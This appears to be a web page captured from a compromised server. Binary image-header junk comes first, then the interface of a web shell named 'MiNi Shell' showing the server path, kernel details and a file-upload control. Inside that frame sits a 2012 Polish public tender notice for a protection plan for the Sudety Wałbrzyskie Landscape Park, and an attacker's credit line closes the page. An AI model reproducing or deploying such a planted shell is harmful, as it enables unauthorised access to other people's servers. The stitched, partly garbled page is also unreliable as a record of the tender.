JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120806/288150-N-2012.html

<p class="kh_header"><b>Wrocław: Wykonanie projektu planu ochrony dla Parku Krajobrazowego Sudetów Wałbrzyskich</b><br>
<b>Numer ogłoszenia: 288150 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Zespół Parków Krajobrazowych , ul. Puszczykowska 10, 50-559 Wrocław, woj. dolnośląskie, tel. 071 364 27 58, faks 071 336-72-89.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzpk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu planu ochrony dla Parku Krajobrazowego Sudetów Wałbrzyskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie projektu planu ochrony dla obszaru Parku Krajobrazowego Sudetów Wałbrzyskich  o powierzchni 6 493 ha leżącego na terenie gmin Boguszów-Gorce, Jedlina-Zdrój, Wałbrzych, Mieroszów, Głuszyca, Czarny Bór w powiecie wałbrzyskim. Nadleśnictwa: Kamienna Góra, Wałbrzych. Wokół parku została wyznaczona otulina o powierzchni 2894,60 ha, położona na terenie gmin: Boguszów-Gorce, Jedlina-Zdrój, Wałbrzych, Mieroszów, Głuszyca w powiecie wałbrzyskim. Nadleśnictwa: Kamienna Góra, Wałbrzych, 
2.	Zamówienie obejmuje:
a.	sporządzenie projektu planu ochrony dla Parku Krajobrazowego Sudetów Wałbrzyskich,
b.	sporządzenie projektu uchwały Sejmiku Województwa Dolnośląskiego w sprawie planu ochrony dla Parku Krajobrazowego Sudetów Wałbrzyskich zgodnie z wymogami formalnymi Urzędu Marszałkowskiego Województwa Dolnośląskiego,
c.	przeprowadzenie procedury związanej z zaopiniowaniem projektu planu ochrony zgodnie z art. 19, ust. 2 ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. 2009 nr 151 poz. 1220 z p.zm.) lub z innymi aktualnymi na dzień odbioru zamówienia aktami prawnymi dotyczącymi przedmiotu zamówienia (jeśli tego wymagają) na podstawie wydanego przez Zamawiającego pełnomocnictwa,
d.	uczestniczenie w posiedzeniach Rady Dolnośląskiego Zespołu Parków Krajobrazowych działającej przy Dolnośląskim Zespole Parków Krajobrazowych, na których omawiana będzie tematyka projektu planu ochrony, 
e.	ujęcie zapisów zawartych w dokumentacjach dotyczących planów ochrony rezerwatów, działań ochronnych i planów ochrony lub zadań ochronnych obszarów Natura 2000 administrowanych przez Regionalnego Dyrektora Ochrony Środowiska, a występujących na terenie parku krajobrazowego (zgodnie z art. 20 ust. 5 ustawy o ochronie przyrody),  wykorzystanie danych RDOŚ dla obszarów: PLH 020038 Góry Kamienne,
f.	uwzględnienie zakresu planu zadań ochronnych, o którym mowa w art. 28 ustawy o ochronie przyrody dla obszarów Natura 2000, dla których nie jest wykonany lub wykonywany plan zadań ochronnych lub plan ochrony: PLB 020010 Sudety Wałbrzysko- Kamiennogórskie,
g.	uczestnictwo w procedurze uzgodnienia projektu planu ochrony z Regionalną Dyrekcją Ochrony Środowiska we Wrocławiu oraz innymi instytucjami wymaganymi przepisami,
h.	dokonywanie w projekcie planu ochrony oraz dokumentacji zgłoszonych przez podmioty, instytucje poprawek, uzgodnionych z Zamawiającym, 
i.	dokonywanie ewentualnych poprawek w projekcie planu ochrony i dokumentacji w ramach gwarancji i rękojmi. 
3.	Zakres prac na potrzeby sporządzenia projektu planu ochrony wynika z zapisów art. 20, ust. 4 ustawy o ochronie przyrody z dnia 16 kwietnia 2004 r. (Dz.U. 2009 nr 151 poz. 1220 z p.zm.) oraz Rozporządzenia Ministra Środowiska z dnia 12 maja 2005 r. w sprawie sporządzania projektu planu ochrony dla parku narodowego, rezerwatu przyrody i parku krajobrazowego, dokonywania zmian w tym planie oraz ochrony zasobów tworów i składników przyrody (Dz. U. Nr 94, poz. 794). 
4.	Projekt planu ochrony należy dostosować do aktualnych na dzień odbioru zamówienia przepisów prawnych. W związku z czym zakres opracowania projektu planu może ulec zmianie, dostosowaniu do aktualnych przepisów.  
5.	W przypadku zmiany treści rozporządzeń wydanych przez ministra właściwego do spraw środowiska dotyczących planów ochrony, Wykonawca zobowiązany jest do nanoszenia stosownych poprawek i zmian w projekcie planu (po wcześniejszym uzgodnieniu z Zamawiającym).
6.	Wykonawca jest zobowiązany do przeniesienia i uwzględnienia w projekcie planu ochrony informacji z operatów leśnych.
7.	Zakres inwentaryzacji zasobów, tworów i składników przyrody, walorów krajobrazowych oraz wartości kulturowych w parku krajobrazowym powinien być zgodny z § 15 rozporządzenia MŚ z 12 maja 2005 (Dz. U. Nr 94, poz. 794).
8.	Zakres ustaleń niezbędnych do identyfikacji i oceny istniejących i potencjalnych zagrożeń wewnętrznych i zewnętrznych, powinien być zgodny z § 16 rozporządzenia MŚ z 12 maja 2005 (Dz. U. Nr 94, poz. 794).
9.	Zakres ustaleń do studiów uwarunkowań i kierunków zagospodarowania przestrzennego gmin, miejscowych planów zagospodarowania przestrzennego, planów zagospodarowania przestrzennego województw dotyczących eliminacji lub ograniczenia zagrożeń zewnętrznych, powinien być zgodny z § 17 rozporządzenia MŚ z 12 maja 2005 (Dz. U. Nr 94, poz. 794).
10.	Wykonawca zobowiązany jest do opracowania wersji elektronicznej i sporządzenia wydruku map tematycznych, o których mowa w § 18 wyżej wymienionego rozporządzenia (Dz. U. Nr 94, poz. 794) w skalach 1:10 000 oraz 1:25 000, z wykorzystaniem danych zebranych w bazie, o której mowa w pkt. 11 i 12. Dopuszcza się połączenie na wydrukach wybranych map tematycznych według schematu uzgodnionego z Zamawiającym - podstawowym kryterium wyboru będzie końcowa czytelność map oraz merytoryczna zasadność proponowanych rozwiązań.
11.	Integralną częścią dokumentacji planu ochrony będzie baza danych przestrzennych wykonana w oprogramowaniu GIS, zawierająca dane geometryczne uzupełnione kompletną informacją atrybutową oraz metadanymi. Zasadnicza część danych winna być zgromadzona i opracowana według wytycznych najnowszej dostępnej wersji Standardu danych GIS w ochronie przyrody (obecna wersja: 3.03.01), z uwzględnieniem najaktualniejszej Adaptacji [...] na potrzeby gromadzenia danych przestrzennych dla projektu POIS.05.03.00-00-186 z 2009 pn. >Opracowanie planów zadań ochronnych dla obszarów Natura 2000 na obszarze Polski< (obecna wersja: 2011.3) - obydwa opracowania prezentuje załącznik nr 8 SIWZ.
12.	Podstawą do sporządzenia map tematycznych, o których mowa w pkt. 10 mają być przekazane przez Zamawiającego podkładowe mapy topograficzne w skali 1:25 000 i 1:10 000 oraz ortofotomapy. Wykonawca ma obowiązek zaktualizować treści starszych podkładów topograficznych w oparciu o najnowsze dane przestrzenne otrzymane od Zamawiającego oraz uzupełniającą inwentaryzację terenową - w zakresie niezbędnym do rzetelnego wykonania projektu planu ochrony z dokumentacją. Powstała w ten sposób aktualizacyjna baza danych przestrzennych, włączona do bazy danych GIS o której mowa w pkt. 11, zawierać będzie warstwy wektorowe złożone z obiektów nowych oraz tych, których rozmiar lub funkcja uległy zmianie, obejmując w szczególności: kompleksy pokrycia terenu, sieci cieków, odcinki dróg i kolei, budowle i urządzenia, obiekty inne - mokradła; trzcinowiska, sitowia.
13.	Wykonawca dostarczy do siedziby Zamawiającego projekt planu ochrony wraz z wykonanymi dokumentacjami na potrzeby sporządzenia projektu planu - w trzech egzemplarzach wydrukowanych oraz trzech w wersji elektronicznej na płytach CD lub DVD. Pliki tekstowe mają być przekazane w formie dokumentów Microsoft Word (*doc) oraz Adobe Acrobat (*pdf). Otrzymany projekt planu ochrony wraz z wykonanymi dokumentacjami winien być zaktualizowany i uspójniony w zakresie wszystkich przeprowadzonych konsultacji i uzgodnień.
14.	Mapy winny być dostarczone:
a)  w formie cyfrowej na płytach CD lub DVD - w trzech egzemplarzach, w postaci zestawu kompozycji mapowych w formacie ESRI .mxd (w pełni kompatybilnym z oprogramowaniem ESRI ArcGis v. 9.3.1) oraz zestawu plików w formacie .tiff, 
b) w formie wydruków wielkoformatowych - po trzy egzemplarze kompletu map w obu wymaganych skalach (1:10 000 oraz 1:25 000), w tym co najmniej jeden komplet map w skali 1:25 000 winien być podklejony na płótnie, a dwa komplety w skali 1:10 000 - zafoliowane.
15.	Bazę danych GIS należy dostarczyć w formie elektronicznej na płytach CD lub DVD - w trzech egzemplarzach, w postaci zgodnej z wytycznymi wskazanymi w pkt. 11 i 12.
16.	Całość zamówienia należy wykonać w języku polskim.
17.	Całość zamówienia należy wykonać do 31 grudnia 2014 r. Zamówienie należy wykonać w trzech etapach:
Etap 1 (od dnia podpisania umowy do dnia 29.11.2013r.) obejmuje:
1.	Zgromadzenie materiałów niepublikowanych i opublikowanych przydatnych do sporządzenia projektu planu ochrony oraz określających stan wiedzy o Parku.
2.	Opracowanie zakresu inwentaryzacji terenowych poszczególnych komponentów środowiska przyrodniczego i kulturowego oraz analiz sfery gospodarczej, w tym stanu zagospodarowania przestrzennego mających wpływ na zachowanie celów ochrony danego Parku. Zakres inwentaryzacji i analiz dostosowany zostanie do specyfiki Parku i do szczególnych celów ochrony Parku wynikających z aktualnego rozporządzenia Wojewody w sprawie utworzenia tego Parku. Szczegółowej inwentaryzacji terenowej zostaną poddane te komponenty, które najlepiej waloryzują teren parku z punktu widzenia celów jego ochrony, i które w najlepszy sposób posłużą do wypracowania strategii ochrony Parku. 
3.	Przeprowadzenie inwentaryzacji terenowych poszczególnych komponentów środowiska przyrodniczego i kulturowego oraz analiz sfery gospodarczej, w tym stanu zagospodarowania przestrzennego.
4.	Opracowanie bazy danych GIS w oparciu o wyniki kwerendy opracowań i badań terenowych.
5.	Opracowanie kameralne dokumentacji niezbędnej do sporządzenia projektu planu ochrony w części dotyczącej diagnozy stanu, zawierającej wyniki inwentaryzacji i waloryzację poszczególnych komponentów środowiska przyrodniczego i kulturowego Parku oraz analiz sfery gospodarczej, w tym stanu zagospodarowania przestrzennego, a także identyfikację zagrożeń wewnętrznych i zewnętrznych dla tych zasobów. Dokumentacja będzie podzielona na operaty tematyczne.
6.	Opracowanie map tematycznych dotyczących etapu diagnozy stanu. 
7.	Przygotowanie sprawozdania etapowego streszczającego postęp realizacji prac oraz prezentacja zebranych materiałów. Dostarczenie do siedziby Zamawiającego kompletu materiałów w formie wydrukowanej oraz w postaci elektronicznej - w ilości egzemplarzy niezbędnej do prawidłowego wykonania recenzji i zatwierdzenia etapu.
W terminie 30 dni od zatwierdzenia protokołem przez Zamawiającego sprawozdania etapowego Zamawiający rozliczy się z Wykonawcą z realizacji 1 etapu. Zatwierdzenie etapu warunkowane jest zgodnością wykonanych prac z powyższym zakresem, która to zgodność zostanie oceniona przez niezależnych recenzentów powołanych przez Zamawiającego (do 4 recenzentów). Ocena zgodności dokonywana przez recenzentów trwać będzie ok. 30 dni.   
Etap 2 (od dnia 02.12.2013 do dnia 06.06.2014) obejmuje:
1.	Opracowanie koncepcji ochrony Parku.
2.	Określenie sposobów ochrony poszczególnych komponentów środowiska przyrodniczego i kulturowego Parku (szczegółowe ustalenia planu ochrony w ramach operatów tematycznych nawiązujące do ogólnej koncepcji ochrony Parku). Każdy operat tematyczny wskazywał będzie obszary działań ochronnych, uwarunkowania realizacji tych działań, zakres monitoringu, potrzeby badawcze Parku, prognozy stanu analizowanego komponentu w wariancie ochrony maksymalnej (pełna realizacja ustaleń planu ochrony) oraz minimalnej (utrzymanie istniejących trendów). 
3.	Opracowanie kameralne drugiej części operatów tematycznych - w części dotyczącej strategii ochrony.
4.	Wykonanie uzupełniającej inwentaryzacji terenowej komponentów środowiska przyrodniczego i kulturowego - w przypadku zaistnienia takich potrzeb.
5.	Uzupełnienie i weryfikacja bazy danych GIS oraz kompletu map tematycznych dotyczących diagnozy stanu i strategii ochrony.
6.	Przygotowanie sprawozdania etapowego streszczającego postęp realizacji prac oraz prezentacja zebranych materiałów. Dostarczenie do siedziby Zamawiającego kompletu materiałów w formie wydrukowanej oraz w postaci elektronicznej - w ilości egzemplarzy niezbędnej do prawidłowego wykonania recenzji i zatwierdzenia etapu.
W terminie 30 dni od zatwierdzenia protokołem przez Zamawiającego sprawozdania etapowego Zamawiający rozliczy się z Wykonawcą z realizacji 2 etapu. Zatwierdzenie etapu warunkowane jest zgodnością wykonanych prac z powyższym zakresem, która to zgodność zostanie oceniona przez niezależnych recenzentów powołanych przez Zamawiającego. Ocena zgodności dokonywana przez recenzentów trwać będzie ok. 30 dni.   
Etap 3 (od dnia 09.06.2014 do dnia 31.12.2014r.) obejmuje: 
1.	Opracowanie syntezy projektu planu ochrony w postaci Operatu generalnego (synteza operatów tematycznych, informacje ogólne).
2.	Opracowanie projektu uchwały Sejmiku WD w sprawie ustanowienia planu ochrony dla Parku Krajobrazowego Sudetów Wałbrzyskich z załącznikami, w tym kartograficznymi - w postaci elektronicznej oraz wydruku barwnego, w ilości egzemplarzy niezbędnej do prawidłowego zaopiniowania, skonsultowania oraz uzgodnienia projektu uchwały.
3.	Przeprowadzenie konsultacji w.w projektu Uchwały z Zamawiającym.
4.	Przeprowadzenie procedury związanej z zaopiniowaniem projektu planu ochrony zgodnie z art. 19, ust. 2 ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. 2009 nr 151 poz. 1220 z p.zm.) lub z innymi aktualnymi na dzień odbioru zamówienia aktami prawnymi dotyczącymi przedmiotu zamówienia (jeśli tego wymagają). Nanoszenie uzgodnionych z Zamawiającym poprawek, wynikłych z opinii rad gmin.
5.	Uczestnictwo w posiedzeniach Rady Dolnośląskiego Zespołu Parków Krajobrazowych działającej przy Dolnośląskim Zespole Parków Krajobrazowych poświęconych zaopiniowaniu projektu planu ochrony. 
6.	Nanoszenie w projekcie planu ochrony oraz dokumentacji zgłoszonych przez Zamawiającego poprawek, wynikających z uwag i wniosków wniesionych w procedurze, którą przeprowadzi Zamawiający w trybie art. 39-43 ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko.
7.	Nanoszenie w projekcie planu ochrony oraz dokumentacji poprawek wynikających z uzgodnień z Regionalną Dyrekcją Ochrony Środowiska we Wrocławiu. 
8.	Przygotowanie ostatecznej wersji projektu uchwały Sejmiku WD w sprawie ustanowienia planu ochrony Parku Krajobrazowego Sudetów Wałbrzyskich wraz z załącznikami mapowymi - w formie wydruku barwnego oraz w postaci elektronicznej, umożliwiającej publikację w Dzienniku Urzędowym Województwa Dolnośląskiego (w ilości egzemplarzy i formie wynikającej z procedur Urzędu Marszałkowskiego WD).
Nanoszenie poprawek odbywa się za porozumieniem i uzgodnieniem z Zamawiającym. 
Do dnia 31.12.2014r. Wykonawca zobowiązany jest dostarczyć do siedziby Zamawiającego pełną dokumentację zadania, wraz z ostatecznym projektem uchwały Sejmiku WD w sprawie planu ochrony, zawierającym załączniki kartograficzne.
Podstawą rozliczenia przedmiotowego i finansowego etapu 3 będzie złożony przez Wykonawcę i zatwierdzony protokołem przez Zamawiającego projekt uchwały w sprawie planu ochrony wraz z kompletną dokumentacją.
Wykonawca udzieli gwarancji na opracowanie planu ochrony w okresie 6 miesięcy od dnia podpisania przez strony protokołu zdawczo-odbiorczego 3 etapu i co najmniej 3 miesiące od dnia uchwalenia planu ochrony przez Sejmik WD. W tym okresie Wykonawca zobowiązuje się do poprawy planu ochrony wraz z dokumentacją..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających polegających na ewentualnym dodruku map tematycznych, o których mowa w pkt II.1.3) ogłoszenia (ppkt. 10 i 14) w skali 1:25 000 lub większej za uzgodnionym wynagrodzeniem.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.71.24.00-5, 90.71.20.00-1, 71.35.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca jest zobowiązany do wniesienia wadium przetargowego w wysokości 2000,00 zł przy przystąpieniu do przetargu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy posiadania doświadczenia i wiedzy na temat zamówienia potwierdzonej wykonaniem w ciągu ostatnich 3 lat minimum 1 (słownie: jednego) projektu planu ochrony dla obszaru chronionej przyrody. Wykonawca dołączy kopie protokołu odbioru w.w zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od wykonawcy, aby w zespole opracowującym projekt planu ochrony znalazły się osoby posiadające wiedzę i doświadczenie w zakresie tworzenia projektów planów ochrony obszarów chronionej przyrody, botaniki, zoologii, ekologii, geologii, geomorfologii, hydrologii, zagospodarowania przestrzennego, zagospodarowania turystycznego, walorów krajobrazowych i wartości kulturowych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę ostatecznego terminu wykonania zamówienia zaplanowanego na dzień 31.12.2014r. na maksymalnie 31.12.2015r. Tym samym Zamawiający dopuszcza zmianę terminów wykonania poszczególnych etapów, mając na uwadze w/w zapis.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dzpkwroclaw.ibip.wroc.pl/public/?id=72998<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Zespół Parków Krajobrazowych, 
ul. Puszczykowska 10, 50- 559 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 10:00, miejsce: Dolnośląski Zespół Parków Krajobrazowych, 
ul. Puszczykowska 10, 50- 559 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com